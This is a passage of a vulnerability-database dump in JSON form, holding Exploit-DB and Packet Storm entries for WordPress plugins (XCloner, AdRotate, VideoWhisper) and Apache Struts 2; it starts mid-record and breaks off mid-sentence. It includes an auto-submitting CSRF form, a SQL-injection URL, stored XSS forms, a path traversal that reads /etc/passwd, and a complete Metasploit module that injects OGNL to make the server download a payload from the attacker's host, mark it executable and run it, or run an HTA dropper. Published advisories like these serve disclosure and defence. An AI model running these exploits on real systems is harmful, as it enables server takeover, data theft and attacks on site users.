Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.\r\n\r\n\r\n\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340\r\n\r\nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.\r\n\r\nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: \r\n\r\n\r\n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"dbbackup\" value=\"1\">\r\n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\">\r\n<input type=\"hidden\" name=\"bname\" value=\"backup\">\r\n<input type=\"hidden\" name=\"backupComments\" value=\"\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_cloner\">\r\n<input type=\"hidden\" name=\"task\" value=\"generate\">\r\n<input type=\"hidden\" name=\"boxchecked\" value=\"0\">\r\n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\">\r\n<input type=\"hidden\" name=\"\" value=\"\">\r\n<input type=\"submit\" name=\"run\" value=\"run\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to XCloner 3.1.1\r\n\r\nMore Information:\r\nhttp://www.xcloner.com/support/download/?did=9\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - \u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.\r\n[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32701/"}, {"lastseen": "2016-02-03T15:35:47", "bulletinFamily": "exploit", "description": "Wordpress AdRotate Plugin 3.9.4 - (clicktracker.php track param) SQL Injection. CVE-2014-1854. Webapps exploit for php platform", "modified": "2014-02-22T00:00:00", "published": "2014-02-22T00:00:00", "id": "EDB-ID:31834", "href": "https://www.exploit-db.com/exploits/31834/", "type": "exploitdb", "title": "WordPress AdRotate Plugin 3.9.4 - clicktracker.php track param SQL Injection", "sourceData": "Advisory ID: HTB23201\r\nProduct: AdRotate\r\nVendor: AJdG Solutions\r\nVulnerable Version(s): 3.9.4 and probably prior\r\nTested Version: 3.9.4\r\nAdvisory Publication: January 30, 2014 [without technical details]\r\nVendor Notification: January 30, 2014 \r\nVendor Patch: January 31, 2014 \r\nPublic Disclosure: February 20, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-1854\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.\r\n\r\n\r\n1) SQL Injection in AdRotate: CVE-2014-1854\r\n\r\nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to\r\n \"/wp-content/plugins/adrotate/library/clicktracker.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version:\r\n\r\nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==\r\n\r\nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server:\r\nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to AdRotate 3.9.5\r\n\r\nMore Information:\r\nhttp://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/\r\nhttp://wordpress.org/plugins/adrotate/changelog/\r\nhttp://www.adrotateplugin.com/development/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23201 - https://www.htbridge.com/advisory/HTB23201 - SQL Injection in AdRotate.\r\n[2] AdRotate - http://wordpress.org/plugins/adrotate/ - AdRotate for WordPress.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u017d is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u017d - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31834/"}, {"lastseen": "2016-02-03T05:11:59", "bulletinFamily": "exploit", "description": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution. CVE-2013-2251. Remote exploits for multiple platform", "modified": "2013-07-27T00:00:00", "published": "2013-07-27T00:00:00", "id": "EDB-ID:27135", "href": "https://www.exploit-db.com/exploits/27135/", "type": "exploitdb", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\r\n 'Description' => %q{\r\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\r\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\r\n a desired navigational target expression. This mechanism was intended to help with\r\n attaching navigational information to buttons within forms.\r\n\r\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\r\n \"redirectAction:\" is not properly sanitized. Since said information will be\r\n evaluated as OGNL expression against the value stack, this introduces the\r\n possibility to inject server side code.\r\n\r\n This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with\r\n Windows 2003 SP2 and Ubuntu 10.04 operating systems.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Takeshi Terada', # Vulnerability discovery\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit modules\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2251' ],\r\n [ 'OSVDB', '95405' ],\r\n [ 'BID', '61189' ],\r\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\r\n ],\r\n 'Platform' => [ 'win', 'linux'],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => 'Jul 2 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\r\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\r\n # It isn't OptPath becuase it's a *remote* path\r\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\r\n ], self.class)\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type == \"meterpreter\"\r\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\r\n end\r\n\r\n @dropped_files.delete_if do |file|\r\n false unless file =~ /\\.exe/\r\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\r\n if session.type == \"meterpreter\"\r\n begin\r\n wintemp = session.fs.file.expand_path(\"%TEMP%\")\r\n win_file = \"#{wintemp}\\\\#{win_file}\"\r\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\r\n session.fs.file.rm(win_file)\r\n print_good(\"Deleted #{file}\")\r\n true\r\n rescue ::Rex::Post::Meterpreter::RequestError\r\n print_error(\"Failed to delete #{win_file}\")\r\n false\r\n end\r\n end\r\n end\r\n\r\n super\r\n end\r\n\r\n def start_http_service\r\n #do not use SSL\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\r\n start_service({\r\n 'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => '/'\r\n }\r\n })\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n\r\n return service_url\r\n end\r\n\r\n def check\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n print_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def auto_target\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\")\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n if res.headers['Location'] =~ /:\\\\/\r\n return targets[1] # Windows\r\n else\r\n return targets[2] # Linux\r\n end\r\n end\r\n\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\r\n\r\n end\r\n\r\n def exploit_linux\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n @pl = @exe\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # download payload\r\n #\r\n fname = datastore['WritableDir']\r\n fname = \"#{fname}/\" unless fname =~ %r'/$'\r\n fname << downfile\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(fname)\r\n\r\n #\r\n # chmod\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # execute\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n end\r\n\r\n def exploit_windows\r\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\r\n @pl = build_hta\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # execute hta\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(@var_exename)\r\n end\r\n\r\n def exploit\r\n if target.name =~ /Automatic/\r\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\r\n my_target = auto_target\r\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\r\n else\r\n my_target = target\r\n end\r\n\r\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\r\n @exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\r\n\r\n if my_target.name =~ /Linux/\r\n if datastore['PAYLOAD'] =~ /windows/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\r\n end\r\n exploit_linux\r\n elsif my_target.name =~ /Windows/\r\n if datastore['PAYLOAD'] =~ /linux/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\r\n end\r\n exploit_windows\r\n end\r\n end\r\n\r\n # Handle incoming requests from the server\r\n def on_request_uri(cli, request)\r\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @pl_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n # wait for the data to be sent\r\n def wait_payload\r\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\r\n\r\n waited = 0\r\n while (not @pl_sent)\r\n select(nil, nil, nil, 1)\r\n waited += 1\r\n if (waited > datastore['HTTP_DELAY'])\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\r\n end\r\n end\r\n end\r\n\r\n def build_hta\r\n var_shellobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj_file = rand_text_alpha(rand(5)+5);\r\n var_vbsname = rand_text_alpha(rand(5)+5);\r\n var_writedir = rand_text_alpha(rand(5)+5);\r\n\r\n var_origLoc = rand_text_alpha(rand(5)+5);\r\n var_byteArray = rand_text_alpha(rand(5)+5);\r\n var_writestream = rand_text_alpha(rand(5)+5);\r\n var_strmConv = rand_text_alpha(rand(5)+5);\r\n\r\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\r\n # even when executing it as an \"HTA\" application\r\n # The encoding code has been stolen from ie_unsafe_scripting.rb\r\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\r\n\r\n # Build the content that will end up in the .vbs file\r\n vbs_content = Rex::Text.to_hex(%Q|\r\nDim #{var_origLoc}, s, #{var_byteArray}\r\n#{var_origLoc} = SetLocale(1033)\r\n|)\r\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\r\n # for conversion with ADODB.Stream\r\n vbs_ary = []\r\n # The output of this loop needs to be as small as possible since it\r\n # gets repeated for every byte of the executable, ballooning it by a\r\n # factor of about 80k (the current size of the exe template). In its\r\n # current form, it's down to about 4MB on the wire\r\n @exe.each_byte do |b|\r\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\r\n end\r\n vbs_content << vbs_ary.join(\"\")\r\n\r\n # Continue with the rest of the vbs file;\r\n # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent\r\n # Then use ADODB.Stream again to write the binary to file.\r\n #print_status(\"Finishing vbs...\");\r\n vbs_content << Rex::Text.to_hex(%Q|\r\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\r\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\r\n\r\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\r\n\r\n#{var_strmConv}.Type = 2\r\n#{var_strmConv}.Charset = \"x-ansi\"\r\n#{var_strmConv}.Open\r\n#{var_strmConv}.WriteText s, 0\r\n#{var_strmConv}.Position = 0\r\n#{var_strmConv}.Type = 1\r\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\r\n\r\nSetLocale(#{var_origLoc})|)\r\n\r\n hta = <<-EOS\r\n <script>\r\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\r\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\r\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\r\n\r\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\r\n #{var_fsobj_file}.Close();\r\n\r\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\r\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\r\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\r\n window.close();\r\n </script>\r\n EOS\r\n\r\n return hta\r\n end\r\n\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27135/"}], "packetstorm": [{"lastseen": "2016-12-05T22:24:07", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-27T00:00:00", "published": "2014-02-27T00:00:00", "href": "https://packetstormsecurity.com/files/125454/VideoWhisper-Live-Streaming-Integration-4.27.3-XSS-Shell-Upload-Traversal.html", "id": "PACKETSTORM:125454", "type": "packetstorm", "title": "VideoWhisper Live Streaming Integration 4.27.3 XSS / Shell Upload / Traversal", "sourceData": "`Advisory ID: HTB23199 \nProduct: VideoWhisper Live Streaming Integration \nVendor: VideoWhisper \nVulnerable Version(s): 4.27.3 and probably prior \nTested Version: 4.27.3 \nAdvisory Publication: February 6, 2014 [without technical details] \nVendor Notification: February 6, 2014 \nVendor Patch: February 7, 2014 \nPublic Disclosure: February 27, 2014 \nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211] \nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908 \nRisk Level: Critical \nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files. \n \n \n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905 \n \nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system. \n \nThe following PoC code demonstrates exploitation of the vulnerability: \n \nAfter successful exploitation the remote shell will be accessible via the following URL: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg \n \nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension. \n \n \n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906 \n \n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u2019s widget. The script will be also executed in administrative section on the following page: \n \nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=live \n \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"u\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page. \n \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php\" method=\"post\"> \n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n</form> \n</body> \n \nThe code will be executed when the user visits the following URL: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads/[room]/Log[date].html \n \nWhere [room] is set by HTTP POST parameter r and [date] is the current date. \n \n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n \n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n \n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907 \n \n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php\" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences. \n \nThe exploitation example below displays contents of \"/etc/passwd\" file: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd \n \n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in 